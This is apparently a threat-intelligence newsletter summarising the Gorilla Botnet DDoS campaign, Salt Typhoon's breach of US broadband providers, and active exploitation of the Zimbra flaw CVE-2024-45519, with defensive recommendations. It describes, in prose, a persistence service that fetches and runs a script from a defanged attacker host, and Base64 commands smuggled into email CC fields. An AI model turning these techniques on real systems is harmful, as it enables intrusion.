ARTICLE
10 October 2024

Ankura CTIX FLASH Update - October 8, 2024

AC
Ankura Consulting Group LLC

Contributor

Ankura Consulting Group, LLC is an independent global expert services and advisory firm that delivers end-to-end solutions to help clients at critical inflection points related to conflict, crisis, performance, risk, strategy, and transformation. Ankura consists of more than 1,800 professionals and has served 3,000+ clients across 55 countries. Collaborative lateral thinking, hard-earned experience, and multidisciplinary capabilities drive results and Ankura is unrivalled in its ability to assist clients to Protect, Create, and Recover Value. For more information, please visit, ankura.com.
Cybersecurity researchers have identified a new botnet family called "Gorilla Botnet" that has been particularly active through the month of September.
United States Technology

Ransomware/Malware Activity

New Gorilla Botnet Issues Over 300,000 DDOS Attacks

Cybersecurity researchers have identified a new botnet family called "Gorilla Botnet" that has been particularly active through the month of September. The Botnet issued over 300,000 attack commands targeting over 100 countries, although most of the attacks were directed at the U.S., China, Canada, and Germany. Targets allegedly included universities, governments, telecommunications companies, banks, and the gaming industry. Researchers determined that the Botnet relied heavily on User Datagram Protocol (UDP) Floods as its preferred method of attack followed by ACK Bypass Flood and VSE Flood methods.

The Botnet can carry out many different types of attacks and uses encryption algorithms similar to those employed by the Keksec group to hide key information, suggesting that the attackers behind this campaign could be related to Keksec. Examination of Gorilla Botnet's source code indicates that it appears to be a variant of the leaked Mirai Botnet. The Botnet infection supports multiple CPU architectures, connects with one of five predefined command-and-control (C2) servers, and embeds functions to exploit a security flaw in Apache Hadoop YARN RPC to achieve remote code execution.

The Botnet maintains persistence by creating a service file named "custom.service" within the "/etc/systemd/system/" directory which is configured to run automatically at system start up. This service downloads a shell script "lol.sh" from remote server "pen[.]gorillafirewall[.]su" to the "/tmp/" directory, sets execution permissions, and executes the script. Denial of Service attacks continue to be one of the most prevalent cybersecurity threats. CTIX analysts recommend that organizations implement controls to mitigate the risk posed by DOS attacks. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.

Threat Actor Activity

Chinese Hackers Breach Broadband Providers to Target U.S. Government's Wiretap System

As an update to our September 27 Flash Threat Actor report, more recent developments have revealed that the Chinese hacking group "Salt Typhoon" breached the networks of major U.S. broadband providers, including Verizon, AT&T, and Lumen Technologies. The hackers allegedly accessed systems used by the U.S. federal government for court-authorized wiretaps, potentially maintaining this access for months to collect intelligence. The Wall Street Journal, citing anonymous sources, reported the breach and noted that the hackers might have engaged in extensive data collection from internet service providers serving millions of Americans.

Salt Typhoon, also known as Earth Estries and Ghost Emperor, has been active since at least 2019. The group typically targets government entities and telecommunications companies, primarily in Southeast Asia, but has also attacked organizations across multiple countries, including Brazil, Canada, and the UK. The group's sophisticated methods often involve exploiting vulnerabilities in software, such as the ProxyLogon flaws in Microsoft Exchange Server, and deploying custom backdoors and rootkits. The U.S. government and private sector security experts are actively investigating the breach's impact, including the type and volume of data accessed.

This incident is part of a broader pattern of cyber espionage by Chinese state-backed actors targeting U.S. and European networking devices and ISPs. Notably, these groups often share infrastructure and tools, indicating coordinated efforts under a common umbrella. Despite the serious implications, Chinese authorities have dismissed the allegations, accusing the U.S. of fabricating narratives to blame China. The ongoing investigation seeks to determine the initial access method used by the hackers, with Cisco routers being one potential vector under scrutiny, though no direct evidence has yet implicated Cisco equipment in the breach. CTIX analysts will continue reporting about ongoing cybersecurity activity amongst threat actors.

Vulnerabilities

CISA Adds Critical Synacor Zimbra Vulnerability to the Known Exploited Vulnerabilities Catalog

The Zimbra Collaboration platform is currently facing active exploitation attempts targeting a critical vulnerability, allowing unauthenticated attackers to execute arbitrary commands through a flaw in its postjournal service. Discovered by researcher Alan Li and assigned a CVSS score of 10, the vulnerability, tracked as CVE-2024-45519, was addressed in Zimbra's September 2024 updates for versions 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9, and 10.1.1. The attacks began on September 28, 2024, after Project Discovery disclosed technical details and proof-of-concept (PoC) exploit code.

Threat actors exploit the flaw by sending spoofed Gmail emails with Base64-encoded commands in the CC fields, which Zimbra servers parse and execute. This approach has been used to deploy web shells on vulnerable servers, allowing further control and execution of commands. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, citing the risk it poses to federal and private systems. CISA has mandated that all Federal Civilian Executive Branch (FCEB) agencies remediate the issue by no later than October 24, 2024, and recommends private organizations apply the patches as well. While the attacks are ongoing, the responsible threat actors remain unidentified. For systems where immediate patching is not feasible, temporarily removing the postjournal service has been suggested to mitigate potential risks. CTIX analysts recommend that affected users follow the guidance in the KEV to prevent exploitation.

The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.

Mondaq uses cookies on this website. By using our website you agree to our use of cookies as set out in our Privacy Policy.

Learn More